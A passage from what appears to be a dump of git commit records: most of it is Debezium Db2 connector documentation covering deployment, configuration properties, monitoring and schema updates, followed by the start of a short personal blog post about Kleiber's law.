you would replace _my-plugins_ with the name of your plug-ins directory:\n+\n[subs=\"+macros,+attributes\"]\n----\nFROM {DockerKafkaConnect}\nUSER root:root\npass:quotes[COPY _.\/my-plugins\/_ \/opt\/kafka\/plugins\/]\nUSER 1001\n----\n+\nBefore Kafka Connect starts running the connector, Kafka Connect loads any third-party plug-ins that are in the `\/opt\/kafka\/plugins` directory.\n\n.. Build the container image. For example, if you saved the `Dockerfile` that you created in the previous step as `debezium-container-for-db2`, and if the `Dockerfile` is in the current directory, then you would run the following command:\n+\n`podman build -t debezium-container-for-db2:latest .`\n\n.. Push your custom image to your container registry, for example:\n+\n`podman push debezium-container-for-db2:latest`\n\n.. Point to the new container image. Do one of the following:\n+\n* Edit the `spec.image` property of the `KafkaConnector` custom resource. If set, this property overrides the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable in the Cluster Operator. For example:\n+\n[source,yaml,subs=\"+attributes\"]\n----\napiVersion: {KafkaConnectApiVersion}\nkind: KafkaConnector\nmetadata:\n name: my-connect-cluster\nspec:\n #...\n image: debezium-container-for-db2\n----\n+\n* In the `install\/cluster-operator\/050-Deployment-strimzi-cluster-operator.yaml` file, edit the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable to point to the new container image and reinstall the Cluster Operator. If you edit this file you must apply it to your OpenShift cluster.\n\n. Create a `KafkaConnector` custom resource that defines your {prodname} Db2 connector instance. See {LinkDebeziumUserGuide}#debezium-db2-connector-configuration-example[the connector configuration example].\n\n. Apply the connector instance, for example:\n+\n`oc apply -f inventory-connector.yaml`\n+\nThis registers `inventory-connector` and the connector starts to run against the `inventory` database.\n\n. Verify that the connector was created and has started to capture changes in the specified database. You can verify the connector instance by watching the Kafka Connect log output as, for example, `inventory-connector` starts.\n\n.. Display the Kafka Connect log output:\n+\n[source,shell,options=\"nowrap\"]\n----\noc logs $(oc get pods -o name -l strimzi.io\/name=my-connect-cluster-connect)\n----\n\n.. Review the log output to verify that the initial snapshot has been executed. You should see something like the following lines:\n+\n[source,shell,options=\"nowrap\"]\n----\n... INFO Starting snapshot for ...\n... INFO Snapshot is using user 'debezium' ...\n----\n\nendif::product[]\n\n.Results\n\nWhen the connector starts, it {link-prefix}:{link-db2-connector}#db2-snapshots[performs a consistent snapshot] of the Db2 database tables that the connector is configured to capture changes for. The connector then starts generating data change events for row-level operations and streaming change event records to Kafka topics.\n\n\/\/ Type: reference\n\/\/ ModuleID: descriptions-of-debezium-db2-connector-configuration-properties\n\/\/ Title: Description of {prodname} Db2 connector configuration properties\n[[db2-connector-properties]]\n=== Connector properties\n\nThe {prodname} Db2 connector has numerous configuration properties that you can use to achieve the right connector behavior for your application. Many properties have default values. Information about the properties is organized as follows:\n\n* xref:db2-required-configuration-properties[Required configuration properties]\n* xref:db2-advanced-configuration-properties[Advanced configuration properties]\n* xref:db2-pass-through-properties[Pass-through configuration properties]\n\n[id=\"db2-required-configuration-properties\"]\nThe following configuration properties are _required_ unless a default value is available.\n\n.Required connector configuration properties\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property |Default |Description\n\n|[[db2-property-name]]<<db2-property-name, `name`>>\n|\n|Unique name for the connector. Attempting to register again with the same name will fail. This property is required by all Kafka Connect connectors.\n\n|[[db2-property-connector-class]]<<db2-property-connector-class, `connector.class`>>\n|\n|The name of the Java class for the connector. Always use a value of `io.debezium.connector.db2.Db2Connector` for the Db2 connector.\n\n|[[db2-property-tasks-max]]<<db2-property-tasks-max, `tasks.max`>>\n|`1`\n|The maximum number of tasks that should be created for this connector. The Db2 connector always uses a single task and therefore does not use this value, so the default is always acceptable.\n\n|[[db2-property-database-hostname]]<<db2-property-database-hostname, `database.hostname`>>\n|\n|IP address or hostname of the Db2 database server.\n\n|[[db2-property-database-port]]<<db2-property-database-port, `database.port`>>\n|`50000`\n|Integer port number of the Db2 database server.\n\n|[[db2-property-database-user]]<<db2-property-database-user, `database.user`>>\n|\n|Name of the Db2 database user for connecting to the Db2 database server.\n\n|[[db2-property-database-password]]<<db2-property-database-password, `database.password`>>\n|\n|Password to use when connecting to the Db2 database server.\n\n|[[db2-property-database-dbname]]<<db2-property-database-dbname, `database.dbname`>>\n|\n|The name of the Db2 database from which to stream the changes\n\n|[[db2-property-database-server-name]]<<db2-property-database-server-name, `database.server{zwsp}.name`>>\n|\n|Logical name that identifies and provides a namespace for the particular Db2 database server that hosts the database for which {prodname} is capturing changes. Only alphanumeric characters and underscores should be used in the database server logical name. The logical name should be unique across all other connectors, since it is used as a topic name prefix for all Kafka topics that receive records from this connector.\n\n|[[db2-property-database-history-kafka-topic]]<<db2-property-database-history-kafka-topic, `database.history{zwsp}.kafka.topic`>>\n|\n|The full name of the Kafka topic where the connector stores the database schema history.\n\n|[[db2-property-database-history-kafka-bootstrap-servers]]<<db2-property-database-history-kafka-bootstrap-servers, `database.history{zwsp}.kafka.bootstrap{zwsp}.servers`>>\n|\n|A list of host\/port pairs that the connector uses to establish an initial connection to the Kafka cluster. This connection is used for retrieving database schema history previously stored by the connector, and for writing each DDL statement read from the source database. Each pair should point to the same Kafka cluster used by the {prodname} Kafka Connect process.\n\n|[[db2-property-table-include-list]]\n[[db2-property-table-include-list]]<<db2-property-table-include-list, `table.include.list`>>\n|\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you want the connector to capture. Any table not included in the include list does not have its changes captured. Each identifier is of the form _schemaName_._tableName_. By default, the connector captures changes in every non-system table. Do not also set the `table.exclude.list` property.\n\n|[[db2-property-table-exclude-list]]\n[[db2-property-table-exclude-list]]<<db2-property-table-exclude-list, `table.exclude.list`>>\n|\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you do not want the connector to capture. The connector captures changes in each non-system table that is not included in the exclude list. Each identifier is of the form _schemaName_._tableName_. Do not also set the `table.include.list` property.\n\n|[[db2-property-column-exclude-list]]\n[[db2-property-column-exclude-list]]<<db2-property-column-exclude-list, `column.exclude.list`>>\n|_empty string_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns to exclude from change event values.\nFully-qualified names for columns are of the form _schemaName_._tableName_._columnName_.\nPrimary key columns are always included in the event's key, even if they are excluded from the value.\n\n|[[db2-property-column-mask-hash]]<<db2-property-column-mask-hash, `column.mask{zwsp}.hash._hashAlgorithm_{zwsp}.with.salt._salt_`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns whose values should be pseudonyms in change event values. A pseudonym is a field value that consists of the hashed value obtained by applying the `_hashAlgorithm_` algorithm and the `_salt_` salt that you specify in the property name. +\n +\nBased on the hash algorithm applied, referential integrity is kept while data is masked. Supported hash algorithms are described in the {link-java7-standard-names}[MessageDigest section] of the Java Cryptography Architecture Standard Algorithm Name Documentation.\nThe hash value is automatically shortened to the length of the column. +\n +\nYou can specify multiple instances of this property with different algorthims and salts. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. For example: +\n +\n`column.mask.hash.SHA-256.with.salt.CzQMA0cB5K =` + `inventory.orders.customerName, inventory.shipment.customerName` +\n +\nwhere `CzQMA0cB5K` is a randomly selected salt.\n +\nDepending on the `_hashAlgorithm_` used, the `_salt_` selected, and the actual data set, the field value may not be completely masked.\n\n|[[db2-property-time-precision-mode]]<<db2-property-time-precision-mode, `time.precision.mode`>>\n|`adaptive`\n| Time, date, and timestamps can be represented with different kinds of precision: +\n +\n`adaptive` captures the time and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type. +\n +\n`connect` always represents time and timestamp values by using Kafka Connect's built-in representations for `Time`, `Date`, and `Timestamp`, which uses millisecond precision regardless of the database columns' precision. See {link-prefix}:{link-db2-connector}#db2-temporal-values[temporal values].\n\n|[[db2-property-tombstones-on-delete]]<<db2-property-tombstones-on-delete, `tombstones.on{zwsp}.delete`>>\n|`true`\n| Controls whether a tombstone event should be generated after a _delete_ event. +\n +\n`true` - delete operations are represented by a _delete_ event and a subsequent tombstone event. +\n +\n`false` - only a _delete_ event is sent. +\n +\nAfter a _delete_ operation, emitting a tombstone event enables Kafka to delete all change event records that have the same key as the deleted row.\n\n|[[db2-property-include-schema-changes]]<<db2-property-include-schema-changes, `include.schema{zwsp}.changes`>>\n|`true`\n|Boolean value that specifies whether the connector should publish changes in the database schema to a Kafka topic with the same name as the database server ID. Each schema change is recorded with a key that contains the database name and a value that is a JSON structure that describes the schema update. This is independent of how the connector internally records database history.\n\n|[[db2-property-column-truncate-to-length-chars]]<<db2-property-column-truncate-to-length-chars, `column.truncate.to.{zwsp}_length_.chars`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. In change event records, values in these columns are truncated if they are longer than the number of characters specified by _length_ in the property name. You can specify multiple properties with different lengths in a single configuration. Length must be a positive integer, for example, `column.truncate.to.20.chars`.\n\n|[[db2-property-column-mask-with-length-chars]]<<db2-property-column-mask-with-length-chars, `column.mask{zwsp}.with._length_.chars`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. In change event values, the values in the specified table columns are replaced with _length_ number of asterisk (`*`) characters. You can specify multiple properties with different lengths in a single configuration. Length must be a positive integer or zero. When you specify zero, the connector replaces a value with an empty string.\n\n|[[db2-property-column-propagate-source-type]]<<db2-property-column-propagate-source-type, `column.propagate{zwsp}.source.type`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_, or _databaseName_._schemaName_._tableName_._columnName_. +\n +\nFor each specified column, the connector adds the column's original type and original length as parameters to the corresponding field schemas in the emitted change records. The following added schema parameters propagate the original type name and also the original length for variable-width types: +\n +\n`pass:[_]pass:[_]debezium.source.column.type` + `pass:[_]pass:[_]debezium.source.column.length` + `pass:[_]pass:[_]debezium.source.column.scale` +\n +\nThis property is useful for properly sizing corresponding columns in sink databases.\n\n|[[db2-property-datatype-propagate-source-type]]<<db2-property-datatype-propagate-source-type, `datatype.propagate{zwsp}.source.type`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the database-specific data type name for some columns. Fully-qualified data type names are of the form _databaseName_._tableName_._typeName_, or _databaseName_._schemaName_._tableName_._typeName_. +\n +\nFor these data types, the connector adds parameters to the corresponding field schemas in emitted change records. The added parameters specify the original type and length of the column: +\n +\n`pass:[_]pass:[_]debezium.source.column.type` + `pass:[_]pass:[_]debezium.source.column.length` + `pass:[_]pass:[_]debezium.source.column.scale` +\n +\nThese parameters propagate a column's original type name and length, for variable-width types, respectively. This property is useful for properly sizing corresponding columns in sink databases. +\n +\nSee {link-prefix}:{link-db2-connector}#db2-data-types[Db2 data types] for the list of Db2-specific data type names.\n\n|[[db2-property-message-key-columns]]<<db2-property-message-key-columns, `message.key{zwsp}.columns`>>\n|_empty string_\n|A semicolon separated list of tables with regular expressions that match table column names. The connector maps values in matching columns to key fields in change event records that it sends to Kafka topics. This is useful when a table does not have a primary key, or when you want to order change event records in a Kafka topic according to a field that is not a primary key. +\n +\nSeparate entries with semicolons. Insert a colon between the fully-qualified table name and its regular expression. The format is: +\n +\n_schema-name_._table-name_:_regexp_;... +\n +\nFor example, +\n +\n`schemaA.table_a:regex_1;schemaB.table_b:regex_2;schemaC.table_c:regex_3` +\n +\nIf `table_a` has a an `id` column, and `regex_1` is `^i` (matches any column that starts with `i`), the connector maps the value in ``table_a``'s `id` column to a key field in change events that the connector sends to Kafka.\n\n|===\n\n[id=\"db2-advanced-configuration-properties\"]\nThe following _advanced_ configuration properties have defaults that work in most situations and therefore rarely need to be specified in the connector's configuration.\n\n.Advanced connector configuration properties\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property |Default |Description\n\n|[[db2-property-snapshot-mode]]<<db2-property-snapshot-mode, `snapshot.mode`>>\n|`initial`\n|Specifies the criteria for performing a snapshot when the connector starts: +\n +\n`initial` - For tables in capture mode, the connector takes a snapshot of the schema for the table and the data in the table. This is useful for populating Kafka topics with a complete representation of the data. +\n +\n`schema_only` - For tables in capture mode, the connector takes a snapshot of only the schema for the table. This is useful when only the changes that are happening from now on need to be emitted to Kafka topics. After the snapshot is complete, the connector continues by reading change events from the database's redo logs.\n\n|[[db2-property-snapshot-isolation-mode]]<<db2-property-snapshot-isolation-mode, `snapshot.isolation{zwsp}.mode`>>\n|`repeatable_read`\n|During a snapshot, controls the transaction isolation level and how long the connector locks the tables that are in capture mode. The possible values are: +\n +\n`read_uncommitted` - Does not prevent other transactions from updating table rows during an initial snapshot. This mode has no data consistency guarantees; some data might be lost or corrupted. +\n +\n`read_committed` - Does not prevent other transactions from updating table rows during an initial snapshot. It is possible for a new record to appear twice: once in the initial snapshot and once in the streaming phase. However, this consistency level is appropriate for data mirroring. +\n +\n`repeatable_read` - Prevents other transactions from updating table rows during an initial snapshot. It is possible for a new record to appear twice: once in the initial snapshot and once in the streaming phase. However, this consistency level is appropriate for data mirroring. +\n +\n`exclusive` - Uses repeatable read isolation level but takes an exclusive lock for all tables to be read. This mode prevents other transactions from updating table rows during an initial snapshot. Only `exclusive` mode guarantees full consistency; the initial snapshot and streaming logs constitute a linear history.\n\n|[[db2-property-event-processing-failure-handling-mode]]<<db2-property-event-processing-failure-handling-mode, `event.processing{zwsp}.failure.handling{zwsp}.mode`>>\n|`fail`\n|Specifies how the connector handles exceptions during processing of events. The possible values are: +\n +\n`fail` - The connector logs the offset of the problematic event and stops processing. +\n +\n`warn` - The connector logs the offset of the problematic event and continues processing with the next event. +\n +\n`skip` - The connector skips the problematic event and continues processing with the next event.\n\n|[[db2-property-poll-interval-ms]]<<db2-property-poll-interval-ms, `poll.interval.ms`>>\n|`1000`\n|Positive integer value that specifies the number of milliseconds the connector should wait for new change events to appear before it starts processing a batch of events. Defaults to 1000 milliseconds, or 1 second.\n\n|[[db2-property-max-queue-size]]<<db2-property-max-queue-size, `max.queue.size`>>\n|`8192`\n|Positive integer value for the maximum size of the blocking queue. The connector places change events that it reads from the database log into the blocking queue before writing them to Kafka. This queue can provide backpressure for reading change-data tables when, for example, writing records to Kafka is slower than it should be or Kafka is not available. Events that appear in the queue are not included in the offsets that are periodically recorded by the connector. The `max.queue.size` value should always be larger than the value of the `max.batch.size` connector configuration property.\n\n|[[db2-property-max-batch-size]]<<db2-property-max-batch-size, `max.batch.size`>>\n|`2048`\n|Positive integer value that specifies the maximum size of each batch of events that the connector processes.\n\n|[[db2-property-max-queue-size-in-bytes]]<<db2-property-max-queue-size-in-bytes, `max.queue.size.in.bytes`>>\n|`0`\n|Long value for the maximum size in bytes of the blocking queue. The feature is disabled by default, it will be active if it's set with a positive long value.\n\n|[[db2-property-heartbeat-interval-ms]]<<db2-property-heartbeat-interval-ms, `heartbeat.interval{zwsp}.ms`>>\n|`0`\n|Controls how frequently the connector sends heartbeat messages to a Kafka topic. The default behavior is that the connector does not send heartbeat messages. +\n +\nHeartbeat messages are useful for monitoring whether the connector is receiving change events from the database. Heartbeat messages might help decrease the number of change events that need to be re-sent when a connector restarts. To send heartbeat messages, set this property to a positive integer, which indicates the number of milliseconds between heartbeat messages. +\n +\nHeartbeat messages are useful when there are many updates in a database that is being tracked but only a tiny number of updates are in tables that are in capture mode. In this situation, the connector reads from the database transaction log as usual but rarely emits change records to Kafka. This means that the connector has few opportunities to send the latest offset to Kafka. Sending heartbeat messages enables the connector to send the latest offset to Kafka.\n\n|[[db2-property-heartbeat-topics-prefix]]<<db2-property-heartbeat-topics-prefix, `heartbeat.topics{zwsp}.prefix`>>\n|`__debezium-heartbeat`\n|Specifies the prefix for the name of the topic to which the connector sends heartbeat messages. The format for this topic name is `<heartbeat.topics.prefix>.<server.name>`.\n\n|[[db2-property-snapshot-delay-ms]]<<db2-property-snapshot-delay-ms, `snapshot.delay.ms`>>\n|\n|An interval in milliseconds that the connector should wait before performing a snapshot when the connector starts. If you are starting multiple connectors in a cluster, this property is useful for avoiding snapshot interruptions, which might cause re-balancing of connectors.\n\n|[[db2-property-snapshot-fetch-size]]<<db2-property-snapshot-fetch-size, `snapshot.fetch.size`>>\n|`2000`\n|During a snapshot, the connector reads table content in batches of rows. This property specifies the maximum number of rows in a batch.\n\n|[[db2-property-snapshot-lock-timeout-ms]]<<db2-property-snapshot-lock-timeout-ms, `snapshot.lock{zwsp}.timeout.ms`>>\n|`10000`\n|Positive integer value that specifies the maximum amount of time (in milliseconds) to wait to obtain table locks when performing a snapshot. If the connector cannot acquire table locks in this interval, the snapshot fails. {link-prefix}:{link-db2-connector}#db2-snapshots[How the connector performs snapshots] provides details. Other possible settings are: +\n +\n`0` - The connector immediately fails when it cannot obtain a lock. +\n +\n`-1` - The connector waits infinitely.\n\n|[[db2-property-snapshot-select-statement-overrides]]<<db2-property-snapshot-select-statement-overrides, `snapshot.select{zwsp}.statement{zwsp}.overrides`>>\n|\n|Controls which table rows are included in snapshots. This property affects snapshots only. It does not affect events that the connector reads from the log. Specify a comma-separated list of fully-qualified table names in the form _schemaName.tableName_. +\n +\nFor each table that you specify, also specify another configuration property: `snapshot.select.statement.overrides._SCHEMA_NAME_._TABLE_NAME_`. For example: `snapshot.select.statement.overrides.customers.orders`. Set this property to a `SELECT` statement that obtains only the rows that you want in the snapshot. When the connector performs a snapshot, it executes this `SELECT` statement to retrieve data from that table. +\n +\nA possible use case for setting these properties is large, append-only tables. You can specify a `SELECT` statement that sets a specific point for where to start a snapshot, or where to resume a snapshot if a previous snapshot was interrupted.\n\n|[[db2-property-sanitize-field-names]]<<db2-property-sanitize-field-names, `sanitize.field{zwsp}.names`>>\n|`true` if connector configuration sets the `key.converter` or `value.converter` property to the Avro converter.\n\n`false` if not.\n|Indicates whether field names are sanitized to adhere to {link-prefix}:{link-avro-serialization}#avro-naming[Avro naming requirements].\n\n|[[db2-property-provide-transaction-metadata]]<<db2-property-provide-transaction-metadata, `provide.transaction{zwsp}.metadata`>>\n|`false`\n|Determines whether the connector generates events with transaction boundaries and enriches change event envelopes with transaction metadata. Specify `true` if you want the connector to do this. See {link-prefix}:{link-db2-connector}#db2-transaction-metadata[Transaction metadata] for details.\n\n|===\n\n[id=\"db2-pass-through-properties\"]\n.Pass-through connector configuration properties\n\nThe connector also supports _pass-through_ configuration properties that it uses when it creates Kafka producers and consumers:\n\n * All connector configuration properties that begin with the `database.history.producer.` prefix are used (without the prefix) when creating the Kafka producer that writes to the database history topic.\n\n * All connector configuration properties that begin with the `database.history.consumer.` prefix are used (without the prefix) when creating the Kafka consumer that reads the database history when the connector starts.\n\nFor example, the following connector configuration properties {link-kafka-docs}.html#security_configclients[secure connections to the Kafka broker]:\n\n[source,indent=0]\n----\ndatabase.history.producer.security.protocol=SSL\ndatabase.history.producer.ssl.keystore.location=\/var\/private\/ssl\/kafka.server.keystore.jks\ndatabase.history.producer.ssl.keystore.password=test1234\ndatabase.history.producer.ssl.truststore.location=\/var\/private\/ssl\/kafka.server.truststore.jks\ndatabase.history.producer.ssl.truststore.password=test1234\ndatabase.history.producer.ssl.key.password=test1234\ndatabase.history.consumer.security.protocol=SSL\ndatabase.history.consumer.ssl.keystore.location=\/var\/private\/ssl\/kafka.server.keystore.jks\ndatabase.history.consumer.ssl.keystore.password=test1234\ndatabase.history.consumer.ssl.truststore.location=\/var\/private\/ssl\/kafka.server.truststore.jks\ndatabase.history.consumer.ssl.truststore.password=test1234\ndatabase.history.consumer.ssl.key.password=test1234\n----\n\nBe sure to consult the {link-kafka-docs}.html[Kafka documentation] for all of the configuration properties for Kafka producers and consumers. Note that the Db2 connector uses the {link-kafka-docs}.html#newconsumerconfigs[new consumer].\n\nAlso, the connector passes configuration properties that start with `database.` to the JDBC URL, for example, `database.applicationName=debezium`.\n\n\/\/ Type: assembly\n\/\/ ModuleID: monitoring-debezium-db2-connector-performance\n\/\/ Title: Monitoring {prodname} Db2 connector performance\n[[db2-monitoring]]\n== Monitoring\n\nThe {prodname} Db2 connector provides three types of metrics that are in addition to the built-in support for JMX metrics that Zookeeper, Kafka, and Kafka Connect provide.\n\n* {link-prefix}:{link-db2-connector}#db2-snapshot-metrics[Snapshot metrics] provide information about connector operation while performing a snapshot.\n* {link-prefix}:{link-db2-connector}#db2-streaming-metrics[Streaming metrics] provide information about connector operation when the connector is capturing changes and streaming change event records.\n* {link-prefix}:{link-db2-connector}#db2-schema-history-metrics[Schema history metrics] provide information about the status of the connector's schema history.\n\n{link-prefix}:{link-debezium-monitoring}[{prodname} monitoring documentation] provides details for how to expose these metrics by using JMX.\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-during-snapshots-of-db2-databases\n\/\/ Title: Monitoring {prodname} during snapshots of Db2 databases\n[[db2-monitoring-snapshots]]\n[[db2-snapshot-metrics]]\n=== Snapshot metrics\n\nThe *MBean* is `debezium.db2:type=connector-metrics,context=snapshot,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-snapshot-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-db2-connector-record-streaming\n\/\/ Title: Monitoring {prodname} Db2 connector record streaming\n[[db2-monitoring-streaming]]\n[[db2-streaming-metrics]]\n=== Streaming metrics\n\nThe *MBean* is `debezium.db2:type=connector-metrics,context=streaming,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-streaming-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-db2-connector-schema history\n\/\/ Title: Monitoring {prodname} Db2 connector schema history\n[[db2-monitoring-schema-history]]\n[[db2-schema-history-metrics]]\n=== Schema history metrics\n\nThe *MBean* is `debezium.db2:type=connector-metrics,context=schema-history,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-schema-history-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: reference\n\/\/ ModuleID: managing-debezium-db2-connectors\n\/\/ Title: Managing {prodname} Db2 connectors\n[[db2-management]]\n== Management\n\nAfter you deploy a {prodname} Db2 connector, use the {prodname} management UDFs to control Db2 replication (ASN) with SQL commands. Some of the UDFs expect a return value in which case you use the SQL `VALUE` statement to invoke them. For other UDFs, use the SQL `CALL` statement.\n\n.Descriptions of {prodname} management UDFs\n[cols=\"1,4\",options=\"header\"]\n|===\n|Task |Command and notes\n\n|[[debezium-db2-start-asn-agent]]<<debezium-db2-start-asn-agent,Start the ASN agent>>\n|`VALUES ASNCDC.ASNCDCSERVICES('start','asncdc');`\n\n|[[debezium-db2-stop-asn-agent]]<<debezium-db2-stop-asn-agent,Stop the ASN agent>>\n|`VALUES ASNCDC.ASNCDCSERVICES('stop','asncdc');`\n\n|[[debezium-db2-check-asn-agent]]<<debezium-db2-check-asn-agent,Check the status of the ASN agent>>\n|`VALUES ASNCDC.ASNCDCSERVICES('status','asncdc');`\n\n|[[debezium-db2-put-capture-mode]]<<debezium-db2-put-capture-mode,Put a table into capture mode>>\n|`CALL ASNCDC.ADDTABLE('MYSCHEMA', 'MYTABLE');` +\n +\nReplace `MYSCHEMA` with the name of the schema that contains the table you want to put into capture mode. Likewise, replace `MYTABLE` with the name of the table to put into capture mode.\n\n|[[debezium-db2-remove-capture-mode]]<<debezium-db2-remove-capture-mode,Remove a table from capture mode>>\n|`CALL ASNCDC.REMOVETABLE('MYSCHEMA', 'MYTABLE');`\n\n|[[debezium-db2-reinitialize-asn-service]]<<debezium-db2-reinitialize-asn-service,Reinitialize the ASN service>>\n|`VALUES ASNCDC.ASNCDCSERVICES('reinit','asncdc');` +\n +\nDo this after you put a table into capture mode or after you remove a table from capture mode.\n\n|===\n\n\/\/ Type: assembly\n\/\/ ModuleID: updating-schemas-for-db2-tables-in-capture-mode-for-debezium-connectors\n\/\/ Title: Updating schemas for Db2 tables in capture mode for {prodname} connectors\n[[db2-schema-evolution]]\n== Schema evolution\n\nWhile a {prodname} Db2 connector can capture schema changes, to update a schema, you must collaborate with a database administrator to ensure that the connector continues to produce change events. This is required by the way that Db2 implements replication.\n\nFor each table in capture mode, Db2's replication feature creates a change-data table that contains all changes to that source table. However, change-data table schemas are static. If you update the schema for a table in capture mode then you must also update the schema of its corresponding change-data table. A {prodname} Db2 connector cannot do this. A database administrator with elevated privileges must update schemas for tables that are in capture mode.\n\n[WARNING]\n====\nIt is vital to execute a schema update procedure completely before there is a new schema update on the same table. Consequently, the recommendation is to execute all DDLs in a single batch so the schema update procedure is done only once.\n====\n\nThere are generally two procedures for updating table schemas:\n\n* {link-prefix}:{link-db2-connector}#db2-offline-schema-update[Offline - executed while {prodname} is stopped]\n* {link-prefix}:{link-db2-connector}#db2-online-schema-update[Online - executed while {prodname} is running]\n\nEach approach has advantages and disadvantages.\n\n\/\/ Type: procedure\n\/\/ ModuleID: performing-offline-schema-updates-for-debezium-db2-connectors\n\/\/ Title: Performing offline schema updates for {prodname} Db2 connectors\n[[db2-offline-schema-update]]\n=== Offline schema update\n\nYou stop the {prodname} Db2 connector before you perform an offline schema update. While this is the safer schema update procedure, it might not be feasible for applications with high-availability requirements.\n\n.Prerequisites\n\n* One or more tables that are in capture mode require schema updates.\n\n.Procedure\n\n. Suspend the application that updates the database.\n. Wait for the {prodname} connector to stream all unstreamed change event records.\n. Stop the {prodname} connector.\n. Apply all changes to the source table schema.\n. In the ASN register table, mark the tables with updated schemas as `INACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.\n. Remove the source table with the old schema from capture mode by {link-prefix}:{link-db2-connector}#debezium-db2-remove-capture-mode[running the {prodname} UDF for removing tables from capture mode].\n. Add the source table with the new schema to capture mode by {link-prefix}:{link-db2-connector}#debezium-db2-put-capture-mode[running the {prodname} UDF for adding tables to capture mode].\n. In the ASN register table, mark the updated source tables as `ACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. Resume the application that updates the database.\n. Restart the {prodname} connector.\n\n\/\/ Type: procedure\n\/\/ ModuleID: performing-online-schema-updates-for-debezium-db2-connectors\n\/\/ Title: Performing online schema updates for {prodname} Db2 connectors\n[[db2-hot-schema-update]]\n=== Online schema update\n\nAn online schema update does not require application and data processing downtime. That is, you do not stop the {prodname} Db2 connector before you perform an online schema update. Also, an online schema update procedure is simpler than the procedure for an offline schema update.\n\nHowever, when a table is in capture mode, after a change to a column name, the Db2 replication feature continues to use the old column name. The new column name does not appear in {prodname} change events. You must restart the connector to see the new column name in change events.\n\n.Prerequisites\n\n* One or more tables that are in capture mode require schema updates.\n\n.Procedure when adding a column to the end of a table\n\n. Lock the source tables whose schema you want to change.\n. In the ASN register table, mark the locked tables as `INACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. Apply all changes to the schemas for the source tables.\n. Apply all changes to the schemas for the corresponding change-data tables.\n. In the ASN register table, mark the source tables as `ACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. Optional. Restart the connector to see updated column names in change events.\n\n.Procedure when adding a column to the middle of a table\n\n. Lock the source table(s) to be changed.\n. In the ASN register table, mark the locked tables as `INACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. For each source table to be changed:\n.. Export the data in the source table.\n.. Truncate the source table.\n.. Alter the source table and add the column.\n.. Load the exported data into the altered source table.\n.. Export the data in the source table's corresponding change-data table.\n.. Truncate the change-data table.\n.. Alter the change-data table and add the column.\n.. Load the exported data into the altered change-data table.\n. In the ASN register table, mark the tables as `INACTIVE`. This marks the old change-data tables as inactive, which allows the data in them to remain but they are no longer updated.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. Optional. Restart the connector to see updated column names in change events.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d34852ebc8be2096d3548536148840da9c2b618e","subject":"Update 2010-11-17-Kleibers-Law.adoc","message":"Update 2010-11-17-Kleibers-Law.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"_posts\/2010-11-17-Kleibers-Law.adoc","new_file":"_posts\/2010-11-17-Kleibers-Law.adoc","new_contents":"= Kleiber's Law\n:hp-tags: light bulb, migrated\n:published_at: 2010-11-17\n\nLast week, I happened to read about Kleiber's law while browsing through literature on natural evolution. The implications are really fascinating. It establishes a relationship between mass and metabolism as:\n\n\\(metabolism = mass^{\\frac{3}{4}}\\)\n\nMetabolism is ultimately linked to the number of heartbeats since the heart regulates the supply of oxygen. Therefore, \\(\\mid heartbeat \\mid \\propto mass\\). Curiously, the number of heartbeats per lifetime tends to be constant. This means that bigger\/heavier animals tend to have slower metabolism with lower heart rate compared to, say, flies, with faster metabolism.\n\nIronically, if we have fixed number of heartbeats, wouldn't running\/exercising make us die faster? I suppose, the long term benefits outweigh shot term loss.\n","old_contents":"= Kleiber's Law\n:hp-tags: light bulb, migrated\n\nLast week, I happened to read about Kleiber's law while browsing through literature on natural evolution. The implications are really fascinating. It establishes a relationship between mass and metabolism as:\n\n\\(metabolism = mass^{\\frac{3}{4}}\\)\n\nMetabolism is ultimately linked to the number of heartbeats since the heart regulates the supply of oxygen. Therefore, \\(\\mid heartbeat \\mid \\propto mass\\). Curiously, the number of heartbeats per lifetime tends to be constant. This means that bigger\/heavier animals tend to have slower 